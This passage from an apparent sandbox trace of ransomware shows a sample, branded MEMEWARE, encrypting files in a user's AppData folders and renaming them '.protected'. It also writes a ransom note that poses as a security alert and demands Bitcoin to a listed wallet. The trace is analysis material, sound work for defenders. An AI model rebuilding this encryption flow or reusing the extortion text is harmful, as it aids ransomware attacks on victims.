lpString2="RESTORE_FILES.txt") returned 1 [0085.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0085.889] StrStrW (lpFirst="Stars.jpg", lpSrch=".txt") returned 0x0 [0085.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0085.889] StrStrW (lpFirst="Stars.jpg", lpSrch=".rar") returned 0x0 [0085.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0085.890] StrStrW (lpFirst="Stars.jpg", lpSrch=".zip") returned 0x0 [0085.890] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1d51, lpOverlapped=0x0) returned 1 [0085.909] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.909] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1d51, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesWritten=0x295e7b4*=0x1d51, lpOverlapped=0x0) returned 1 [0085.909] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.909] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.910] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.910] CloseHandle (hObject=0x150) returned 1 [0085.910] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.protected") returned 101 [0085.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.protected")) returned 1 [0085.911] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.911] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.911] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\RESTORE_FILES.txt") returned 99 [0085.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.912] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.912] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.912] lstrlenA (lpString="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") returned 684 [0085.912] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.912] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.912] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.912] CloseHandle (hObject=0x14c) returned 1 [0085.913] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Windows") returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files") returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files (x86)") returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="$Recycle.bin") returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="System Volume Information") returned 1 [0085.913] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0085.913] StrStrIW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".protected") returned 0x0 [0085.913] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="RESTORE_FILES.txt") returned 1 [0085.913] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.913] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0085.914] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0085.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0085.914] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".rar") returned 0x0 [0085.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0085.914] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".zip") returned 0x0 [0085.914] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.929] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.929] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.930] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.930] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.932] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.932] CloseHandle (hObject=0x14c) returned 1 [0085.932] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.protected") returned 107 [0085.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.protected")) returned 1 [0085.933] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Windows") returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files") returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files (x86)") returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="$Recycle.bin") returned 1 [0085.933] lstrcmpiW 
(lpString1="WindowsMail.pat", lpString2="System Volume Information") returned 1 [0085.933] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0085.933] StrStrIW (lpFirst="WindowsMail.pat", lpSrch=".protected") returned 0x0 [0085.933] lstrcmpW (lpString1="WindowsMail.pat", lpString2="RESTORE_FILES.txt") returned 1 [0085.933] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.933] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.934] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0085.934] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0085.934] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0085.934] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".rar") returned 0x0 [0085.934] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0085.934] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".zip") returned 0x0 [0085.934] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesRead=0x295ea24*=0x0, lpOverlapped=0x0) returned 1 [0085.935] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.935] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x0, lpOverlapped=0x0) returned 1 [0085.935] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.935] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.935] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.935] CloseHandle (hObject=0x14c) returned 1 [0085.936] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.protected") returned 96 [0085.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat.protected")) returned 1 [0085.936] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.936] FindClose (in: hFindFile=0x47ba50 | out: 
hFindFile=0x47ba50) returned 1 [0085.936] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\RESTORE_FILES.txt") returned 88 [0085.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.937] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.937] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.937] lstrlenA (lpString="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") returned 684 [0085.937] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.938] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.938] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.938] CloseHandle (hObject=0xd8) returned 1 [0085.938] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="Windows") returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="Program Files") returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="Program Files (x86)") returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="$Recycle.bin") returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="System Volume Information") returned 1 [0085.938] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media") returned 71 [0085.938] lstrcmpW (lpString1="Windows Media", lpString2=".") returned 1 [0085.938] lstrcmpW (lpString1="Windows Media", lpString2="..") returned 1 [0085.938] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\*") returned 73 [0085.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.938] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.938] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.938] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.938] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.938] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.938] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\.") returned 73 [0085.939] lstrcmpW (lpString1=".", 
lpString2=".") returned 0 [0085.939] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.939] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.939] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\..") returned 74 [0085.939] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.939] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.939] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="Windows") returned -1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="Program Files") returned -1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="Program Files (x86)") returned -1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="$Recycle.bin") returned 1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="System Volume Information") returned -1 [0085.939] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned 76 [0085.939] lstrcmpW (lpString1="12.0", lpString2=".") returned 1 [0085.939] lstrcmpW (lpString1="12.0", lpString2="..") returned 1 [0085.939] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*") returned 78 [0085.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.939] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.939] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.939] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.939] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.939] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.939] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\.") returned 78 [0085.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.939] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.940] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\..") returned 79 [0085.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.940] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Windows") returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Program Files") returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Program Files (x86)") returned 1 
[0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="$Recycle.bin") returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="System Volume Information") returned 1 [0085.940] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0085.940] StrStrIW (lpFirst="WMSDKNS.DTD", lpSrch=".protected") returned 0x0 [0085.940] lstrcmpW (lpString1="WMSDKNS.DTD", lpString2="RESTORE_FILES.txt") returned 1 [0085.940] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.940] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), 